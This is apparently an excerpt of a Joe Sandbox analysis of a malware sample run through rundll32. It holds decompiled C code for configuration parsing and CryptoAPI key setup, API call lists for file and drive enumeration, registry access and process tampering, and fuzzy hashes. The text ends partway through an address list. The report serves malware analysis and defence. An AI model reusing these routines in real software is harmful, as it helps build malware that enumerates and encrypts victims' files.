                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Free$HeapString
                                                          • String ID:
                                                          • API String ID: 3806048269-0
                                                          • Opcode ID: 0a1fea727550e850cc672d91a6699f4d11f2149f56085f59cb6c98448c23c5ca
                                                          • Instruction ID: 0acb9cacb048f54b00aa264fa2bccee8508963b19976f02f3bd8cba2fa8b3f6b
                                                          • Opcode Fuzzy Hash: 0a1fea727550e850cc672d91a6699f4d11f2149f56085f59cb6c98448c23c5ca
                                                          • Instruction Fuzzy Hash: B1014B72900619BBCF22DF94DC01EEA7BA6EF09750F088428FE069A224D771D960DBD4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                           			E036D24B3(void* __ecx, void* __edx, void* _a4, void* _a8) {
                                                           				void* _t11;
                                                           				void* _t13;
                                                           				void* _t21;
                                                           				void* _t23; // register operand not recovered by the decompiler
                                                           
                                                           				_t11 =  &_a4;
                                                           				_t21 = 0;
                                                           				// unresolved import; the API list below places lstrlen at 036D24C4
                                                           				__imp__( &_a8);
                                                           				// E036D5FBB sets up a CryptoAPI key (CryptAcquireContextW / CryptImportKey / CryptSetKeyParam, per the API list)
                                                           				_t13 = E036D5FBB( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                                                           				if(_t13 == 0) {
                                                           					// E036D6D63 allocates the output buffer (RtlAllocateHeap) with twice the input length
                                                           					_t21 = E036D6D63(_a8 + _a8);
                                                           					if(_t21 != 0) {
                                                           						E036D298F(_a4, _t21, _t23);
                                                           					}
                                                           					// E036D6C2C releases the temporary buffer (RtlFreeHeap, per the API list for E036D2B23 below)
                                                           					E036D6C2C(_a4);
                                                           				}
                                                           				return _t21;
                                                           			}


                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,036D58D7,00000000,?,036D1D97,00000000,036D58D7,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D24C4
                                                            • Part of subcall function 036D5FBB: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,036D24D8,00000001,036D58D7,00000000), ref: 036D5FF3
                                                            • Part of subcall function 036D5FBB: memcpy.NTDLL(036D24D8,036D58D7,00000010,?,?,?,036D24D8,00000001,036D58D7,00000000,?,036D1D97,00000000,036D58D7,?,75BCC740), ref: 036D600C
                                                            • Part of subcall function 036D5FBB: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 036D6035
                                                            • Part of subcall function 036D5FBB: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 036D604D
                                                            • Part of subcall function 036D5FBB: memcpy.NTDLL(00000000,75BCC740,059695B0,00000010), ref: 036D609F
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                           • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                           • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                           • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                           • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                                          • String ID:
                                                          • API String ID: 894908221-0
                                                          • Opcode ID: fe09e377e4c8dd58ad62edd12d3db9045c34dfa4ec3b6d8df3b98933430dd040
                                                          • Instruction ID: 751176b37d4999f4cc4d6c0dab3ebc37ef69b363ccd93d8ecc1ad3fc176caf05
                                                          • Opcode Fuzzy Hash: fe09e377e4c8dd58ad62edd12d3db9045c34dfa4ec3b6d8df3b98933430dd040
                                                          • Instruction Fuzzy Hash: 91F05E3A500209BBCF11AF65DD00CEB7FADEF85360B448026FD09CE114DB31DA559BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                           			E036D74B6(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
                                                           				intOrPtr _t14; // register operand not recovered by the decompiler
                                                           				void* _t17;
                                                           
                                                           				if(_a4 == 0) {
                                                           					L2:
                                                           					// size passed on is the wide-string length of _a20 plus the unrecovered register value plus 2
                                                           					return E036D23D9(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                                                           				}
                                                           				// E036D14F1 wraps _a20 in a BSTR (SysAllocString / SysFreeString, per the API list)
                                                           				_t17 = E036D14F1(_a4, _a8, _a12, _a16, _a20); // executed
                                                           				if(_t17 != 0) {
                                                           					goto L2;
                                                           				}
                                                           				return _t17;
                                                           			}


                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,036D363B,3D036D90,80000002,036D7168,036D7283,74666F53,4D4C4B48,036D7283,?,3D036D90,80000002,036D7168,?), ref: 036D74DB
                                                            • Part of subcall function 036D14F1: SysAllocString.OLEAUT32(036D7283), ref: 036D150A
                                                            • Part of subcall function 036D14F1: SysFreeString.OLEAUT32(00000000), ref: 036D154B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                           • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                           • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                           • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                           • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFreelstrlen
                                                          • String ID:
                                                          • API String ID: 3808004451-0
                                                          • Opcode ID: d18d2cd558825feccd93942fc7f145d5901d6c344dbfd1cf33bb649d88d33e5c
                                                          • Instruction ID: 80f68beda79b8213271ea51977e6460f64f888490b7cd02f2ec27e9efb6dcfe9
                                                          • Opcode Fuzzy Hash: d18d2cd558825feccd93942fc7f145d5901d6c344dbfd1cf33bb649d88d33e5c
                                                          • Instruction Fuzzy Hash: 99F0923640020EBFDF02AF90ED05EEA7F6AAB18350F048018BA1458161D772C5B1EBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                           			E036D2B23(void* __edi, void* _a4) {
                                                           				int _t7;
                                                           				int _t12;
                                                           
                                                           				// E036D2575 fills a heap buffer (memcpy / memset, per the API list) and returns its length; _a4 receives the buffer
                                                           				_t7 = E036D2575(__edi, _a4,  &_a4); // executed
                                                           				_t12 = _t7;
                                                           				if(_t12 != 0) {
                                                           					// copy the result into the caller's buffer and NUL-terminate it
                                                           					memcpy(__edi, _a4, _t12);
                                                           					 *((char*)(__edi + _t12)) = 0;
                                                           					// E036D6C2C releases the temporary buffer (RtlFreeHeap)
                                                           					E036D6C2C(_a4);
                                                           				}
                                                           				return _t12;
                                                           			}


                                                          APIs
                                                            • Part of subcall function 036D2575: memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,036D4493,?), ref: 036D25AB
                                                            • Part of subcall function 036D2575: memset.NTDLL ref: 036D2621
                                                            • Part of subcall function 036D2575: memset.NTDLL ref: 036D2635
                                                          • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,036D4493,?,?,?,?), ref: 036D2B3F
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                           • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                           • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                           • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                           • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpymemset$FreeHeap
                                                          • String ID:
                                                          • API String ID: 3053036209-0
                                                          • Opcode ID: 9861f71267f26eea5288bfea07ab5eea21efb883178210c204045fd7d85c8362
                                                          • Instruction ID: aadc849bf3e867c8ff30b72de5cb437ff84e184831463a87950a1106a52c3f61
                                                          • Opcode Fuzzy Hash: 9861f71267f26eea5288bfea07ab5eea21efb883178210c204045fd7d85c8362
                                                          • Instruction Fuzzy Hash: 70E08C7AC0022876CB12AE94EC00DEBBF6CDF46691F048428FE088E200D632C61097E6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 062773F5
                                                            • Part of subcall function 06276261: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 062762A8
                                                            • Part of subcall function 06276261: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00000000), ref: 062762BE
                                                            • Part of subcall function 06276261: RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 06276307
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Open$Closememset
                                                          • String ID:
                                                          • API String ID: 1685373161-0
                                                          • Opcode ID: eae4752445d7aaf48354e339488d86f7a0e057409763ad57a1612276153bc34b
                                                          • Instruction ID: 91fd386a32754be6de007feafaf5433078757ccdd22557d91a45a846523b1704
                                                          • Opcode Fuzzy Hash: eae4752445d7aaf48354e339488d86f7a0e057409763ad57a1612276153bc34b
                                                          • Instruction Fuzzy Hash: 2CE0C730210108BBDBC0BE88CC52F997BA8EF00340F008004BE186EA82CE31EA60C7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,062960E0,0000002C,062890D3,06898E36,?,00000000,0628A484,?,00000318), ref: 06291EB7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeVirtual
                                                          • String ID:
                                                          • API String ID: 1263568516-0
                                                          • Opcode ID: e642ca2dce14b9949eebf8d5557e62b2ce31bed936f0ebccb2dcd7a87d6e89f9
                                                          • Instruction ID: 7a1077e5eddf15addc8127bf0de3ffa76c0d1d25265fa620ad88f2917aae71c0
                                                          • Opcode Fuzzy Hash: e642ca2dce14b9949eebf8d5557e62b2ce31bed936f0ebccb2dcd7a87d6e89f9
                                                          • Instruction Fuzzy Hash: 57D01730E0161ADBCF61DB95DC4A99EFB71BF48720F608224E96073190C3301915CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                            • Part of subcall function 062821B6: ExpandEnvironmentStringsW.KERNEL32(0627AEB5,00000000,00000000,00000001,00000000,00000000,0627E448,0627AEB5,00000000,0627E448,?), ref: 062821CD
                                                            • Part of subcall function 062821B6: ExpandEnvironmentStringsW.KERNEL32(0627AEB5,00000000,00000000,00000000), ref: 062821E7
                                                          • lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0628BB1D
                                                          • lstrlenW.KERNEL32(?,?,00000000), ref: 0628BB29
                                                          • memset.NTDLL ref: 0628BB71
                                                          • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0628BB8C
                                                          • lstrlenW.KERNEL32(0000002C), ref: 0628BBC4
                                                          • lstrlenW.KERNEL32(?), ref: 0628BBCC
                                                          • memset.NTDLL ref: 0628BBEF
                                                          • wcscpy.NTDLL ref: 0628BC01
                                                          • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0628BC27
                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 0628BC5D
                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 0628BC79
                                                          • FindNextFileW.KERNEL32(?,00000000), ref: 0628BC92
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 0628BCA4
                                                          • FindClose.KERNEL32(?), ref: 0628BCB9
                                                          • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0628BCCD
                                                          • lstrlenW.KERNEL32(0000002C), ref: 0628BCEF
                                                          • FindNextFileW.KERNEL32(?,00000000), ref: 0628BD65
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 0628BD77
                                                          • FindClose.KERNEL32(?), ref: 0628BD92
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                                                          • String ID:
                                                          • API String ID: 2962561936-0
                                                          • Opcode ID: a842a1db202b8a32ed96ce24dd66a21b2f35b22b0c5e8ab7347a415b9f2389c9
                                                          • Instruction ID: d046da909be629d225ceaf9b98ba993790e7810dc2880acb08b8aa561c19f3f6
                                                          • Opcode Fuzzy Hash: a842a1db202b8a32ed96ce24dd66a21b2f35b22b0c5e8ab7347a415b9f2389c9
                                                          • Instruction Fuzzy Hash: 1D817B70915306AFD7A1EF24DC88A1BBBE9FF88305F04482DF995961A2DB74D805CF62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 062710FA
                                                          • GetLastError.KERNEL32 ref: 06271108
                                                          • NtSetInformationProcess.NTDLL ref: 06271162
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 062711A1
                                                          • GetProcAddress.KERNEL32(?), ref: 062711C2
                                                          • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 06271219
                                                          • CloseHandle.KERNEL32(?), ref: 0627122F
                                                          • CloseHandle.KERNEL32(?), ref: 06271255
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                                                          • String ID: v
                                                          • API String ID: 3529370251-1801730948
                                                          • Opcode ID: ca06413dda146b97014b020df96330d675c75f0111fc7edefdad82a4fc9efd12
                                                          • Instruction ID: 4803e65f2cde4dc2ef4988a38fb3fc057e55272acd66f75c42475da50a11de3a
                                                          • Opcode Fuzzy Hash: ca06413dda146b97014b020df96330d675c75f0111fc7edefdad82a4fc9efd12
                                                          • Instruction Fuzzy Hash: 38419D70624346AFD7419F64E84DE1ABBF5FFCA308F040929FA55A6110D3708A59CFA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0627B270
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0627B2A2
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0627B2D4
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0627B306
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0627B338
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0627B36A
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0627B39C
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0627B3CE
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0627B400
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 0627B593
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 0627B637
                                                            • Part of subcall function 06287736: RtlAllocateHeap.NTDLL ref: 06287777
                                                            • Part of subcall function 06287736: memset.NTDLL ref: 0628778B
                                                            • Part of subcall function 06287736: GetCurrentThreadId.KERNEL32 ref: 06287818
                                                            • Part of subcall function 06287736: GetCurrentThread.KERNEL32 ref: 0628782B
                                                            • Part of subcall function 06276537: RtlEnterCriticalSection.NTDLL(0689C2D0), ref: 06276540
                                                            • Part of subcall function 06276537: HeapFree.KERNEL32(00000000,?), ref: 06276572
                                                            • Part of subcall function 06276537: RtlLeaveCriticalSection.NTDLL(0689C2D0), ref: 06276590
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 0627B5DF
                                                            • Part of subcall function 0627D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0627DA7B,?), ref: 0627D4E3
                                                            • Part of subcall function 0627D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 0627D506
                                                            • Part of subcall function 0627D4DA: memset.NTDLL ref: 0627D515
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$CriticalCurrentSectionThreadmemset$AllocateEnterLeavelstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3296958911-0
                                                          • Opcode ID: 35e3bd9abc1750b9160174819b3f68d9eb8f4cf707545b75c866901af40dccfa
                                                          • Instruction ID: 61c5f17008455ab1aaa08d5406f7943b43cf3d37e0d53992477e9a6bafc0de65
                                                          • Opcode Fuzzy Hash: 35e3bd9abc1750b9160174819b3f68d9eb8f4cf707545b75c866901af40dccfa
                                                          • Instruction Fuzzy Hash: 7EF183B2E31316AFDBD0EF78EC98D6F33D99B482417154925EE01DB240DA34E941DBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • wcscpy.NTDLL ref: 0627FD7B
                                                          • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 0627FD87
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0627FD98
                                                          • memset.NTDLL ref: 0627FDB5
                                                          • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 0627FDC3
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 0627FDD1
                                                          • GetDriveTypeW.KERNEL32(?), ref: 0627FDDF
                                                          • lstrlenW.KERNEL32(?), ref: 0627FDEB
                                                          • wcscpy.NTDLL ref: 0627FDFD
                                                          • lstrlenW.KERNEL32(?), ref: 0627FE17
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0627FE30
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                                                          • String ID:
                                                          • API String ID: 3888849384-0
                                                          • Opcode ID: cf0a7ff2aa23eed808d1cb723993cfe00d338986985e82783ebe6373fccfe8ca
                                                          • Instruction ID: d467b47d8f21910fcd756203d13748872f610010ed66f99111cd41337607f28f
                                                          • Opcode Fuzzy Hash: cf0a7ff2aa23eed808d1cb723993cfe00d338986985e82783ebe6373fccfe8ca
                                                          • Instruction Fuzzy Hash: 5C313C72D1420DFFDB01AFA4ED88CAEBBBEEB48354B104426E605E3111E735AE559F60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E036D1645(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                                                          				int _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				signed int _t28;
                                                          				signed int _t33;
                                                          				signed int _t39;
                                                          				char* _t45;
                                                          				char* _t46;
                                                          				char* _t47;
                                                          				char* _t48;
                                                          				char* _t49;
                                                          				char* _t50;
                                                          				void* _t51;
                                                          				void* _t52;
                                                          				void* _t53;
                                                          				intOrPtr _t54;
                                                          				void* _t56;
                                                          				intOrPtr _t57;
                                                          				intOrPtr _t58;
                                                          				signed int _t61;
                                                          				intOrPtr _t64;
                                                          				signed int _t65;
                                                          				signed int _t70;
                                                          				void* _t72;
                                                          				void* _t73;
                                                          				signed int _t75;
                                                          				signed int _t78;
                                                          				signed int _t82;
                                                          				signed int _t86;
                                                          				signed int _t90;
                                                          				signed int _t94;
                                                          				signed int _t98;
                                                          				void* _t101;
                                                          				void* _t102;
                                                          				void* _t115;
                                                          				void* _t118;
                                                          				intOrPtr _t121;
                                                          
                                                          				_t118 = __esi;
                                                          				_t115 = __edi;
                                                          				_t104 = __ecx;
                                                          				_t101 = __ebx;
                                                          				_t28 =  *0x36da344; // 0x69b25f44
                                                          				if(E036D7780( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                                                          					 *0x36da378 = _v8;
                                                          				}
                                                          				_t33 =  *0x36da344; // 0x69b25f44
                                                          				if(E036D7780( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                                          					_v12 = 2;
                                                          					L69:
                                                          					return _v12;
                                                          				}
                                                          				_t39 =  *0x36da344; // 0x69b25f44
                                                          				_push(_t115);
                                                          				if(E036D7780( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                                          					L67:
                                                          					HeapFree( *0x36da2d8, 0, _v16);
                                                          					goto L69;
                                                          				} else {
                                                          					_push(_t101);
                                                          					_t102 = _v12;
                                                          					if(_t102 == 0) {
                                                          						_t45 = 0;
                                                          					} else {
                                                          						_t98 =  *0x36da344; // 0x69b25f44
                                                          						_t45 = E036D5450(_t104, _t102, _t98 ^ 0x7895433b);
                                                          					}
                                                          					_push(_t118);
                                                          					if(_t45 != 0) {
                                                          						_t104 =  &_v8;
                                                          						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                                          							 *0x36da2e0 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t102 == 0) {
                                                          						_t46 = 0;
                                                          					} else {
                                                          						_t94 =  *0x36da344; // 0x69b25f44
                                                          						_t46 = E036D5450(_t104, _t102, _t94 ^ 0x219b08c7);
                                                          					}
                                                          					if(_t46 != 0) {
                                                          						_t104 =  &_v8;
                                                          						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                                          							 *0x36da2e4 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t102 == 0) {
                                                          						_t47 = 0;
                                                          					} else {
                                                          						_t90 =  *0x36da344; // 0x69b25f44
                                                          						_t47 = E036D5450(_t104, _t102, _t90 ^ 0x31fc0661);
                                                          					}
                                                          					if(_t47 != 0) {
                                                          						_t104 =  &_v8;
                                                          						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                                          							 *0x36da2e8 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t102 == 0) {
                                                          						_t48 = 0;
                                                          					} else {
                                                          						_t86 =  *0x36da344; // 0x69b25f44
                                                          						_t48 = E036D5450(_t104, _t102, _t86 ^ 0x0cd926ce);
                                                          					}
                                                          					if(_t48 != 0) {
                                                          						_t104 =  &_v8;
                                                          						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                                          							 *0x36da004 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t102 == 0) {
                                                          						_t49 = 0;
                                                          					} else {
                                                          						_t82 =  *0x36da344; // 0x69b25f44
                                                          						_t49 = E036D5450(_t104, _t102, _t82 ^ 0x3cd8b2cb);
                                                          					}
                                                          					if(_t49 != 0) {
                                                          						_t104 =  &_v8;
                                                          						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                                          							 *0x36da02c = _v8;
                                                          						}
                                                          					}
                                                          					if(_t102 == 0) {
                                                          						_t50 = 0;
                                                          					} else {
                                                          						_t78 =  *0x36da344; // 0x69b25f44
                                                          						_t50 = E036D5450(_t104, _t102, _t78 ^ 0x2878b929);
                                                          					}
                                                          					if(_t50 == 0) {
                                                          						L41:
                                                          						 *0x36da2ec = 5;
                                                          						goto L42;
                                                          					} else {
                                                          						_t104 =  &_v8;
                                                          						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                                          							goto L41;
                                                          						} else {
                                                          							L42:
                                                          							if(_t102 == 0) {
                                                          								_t51 = 0;
                                                          							} else {
                                                          								_t75 =  *0x36da344; // 0x69b25f44
                                                          								_t51 = E036D5450(_t104, _t102, _t75 ^ 0x261a367a);
                                                          							}
                                                          							if(_t51 != 0) {
                                                          								_push(_t51);
                                                          								_t72 = 0x10;
                                                          								_t73 = E036D2FBC(_t72);
                                                          								if(_t73 != 0) {
                                                          									_push(_t73);
                                                          									E036D72C7();
                                                          								}
                                                          							}
                                                          							if(_t102 == 0) {
                                                          								_t52 = 0;
                                                          							} else {
                                                          								_t70 =  *0x36da344; // 0x69b25f44
                                                          								_t52 = E036D5450(_t104, _t102, _t70 ^ 0xb9d404b2);
                                                          							}
                                                          							if(_t52 != 0 && E036D2FBC(0, _t52) != 0) {
                                                          								_t121 =  *0x36da3cc; // 0x59695b0
                                                          								E036D765B(_t121 + 4, _t68);
                                                          							}
                                                          							if(_t102 == 0) {
                                                          								_t53 = 0;
                                                          							} else {
                                                          								_t65 =  *0x36da344; // 0x69b25f44
                                                          								_t53 = E036D5450(_t104, _t102, _t65 ^ 0x3df17130);
                                                          							}
                                                          							if(_t53 == 0) {
                                                          								L59:
                                                          								_t54 =  *0x36da348; // 0x228d5a8
                                                          								_t22 = _t54 + 0x36db252; // 0x616d692f
                                                          								 *0x36da374 = _t22;
                                                          								goto L60;
                                                          							} else {
                                                          								_t64 = E036D2FBC(0, _t53);
                                                          								 *0x36da374 = _t64;
                                                          								if(_t64 != 0) {
                                                          									L60:
                                                          									if(_t102 == 0) {
                                                          										_t56 = 0;
                                                          									} else {
                                                          										_t61 =  *0x36da344; // 0x69b25f44
                                                          										_t56 = E036D5450(_t104, _t102, _t61 ^ 0xd2079859);
                                                          									}
                                                          									if(_t56 == 0) {
                                                          										_t57 =  *0x36da348; // 0x228d5a8
                                                          										_t23 = _t57 + 0x36db79e; // 0x6976612e
                                                          										_t58 = _t23;
                                                          									} else {
                                                          										_t58 = E036D2FBC(0, _t56);
                                                          									}
                                                          									 *0x36da3e0 = _t58;
                                                          									HeapFree( *0x36da2d8, 0, _t102);
                                                          									_v12 = 0;
                                                          									goto L67;
                                                          								}
                                                          								goto L59;
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          			}
                                                          0x036d1645
                                                          0x036d1645
                                                          0x036d1645
                                                          0x036d1645
                                                          0x036d1648
                                                          0x036d1665
                                                          0x036d1673
                                                          0x036d1673
                                                          0x036d1678
                                                          0x036d1692
                                                          0x036d1900
                                                          0x036d1907
                                                          0x036d190b
                                                          0x036d190b
                                                          0x036d1698
                                                          0x036d169d
                                                          0x036d16b5
                                                          0x036d18ed
                                                          0x036d18f7
                                                          0x00000000
                                                          0x036d16bb
                                                          0x036d16bb
                                                          0x036d16bc
                                                          0x036d16c1
                                                          0x036d16d7
                                                          0x036d16c3
                                                          0x036d16c3
                                                          0x036d16d0
                                                          0x036d16d0
                                                          0x036d16d9
                                                          0x036d16e2
                                                          0x036d16e4
                                                          0x036d16ee
                                                          0x036d16f3
                                                          0x036d16f3
                                                          0x036d16ee
                                                          0x036d16fa
                                                          0x036d1710
                                                          0x036d16fc
                                                          0x036d16fc
                                                          0x036d1709
                                                          0x036d1709
                                                          0x036d1714
                                                          0x036d1716
                                                          0x036d1720
                                                          0x036d1725
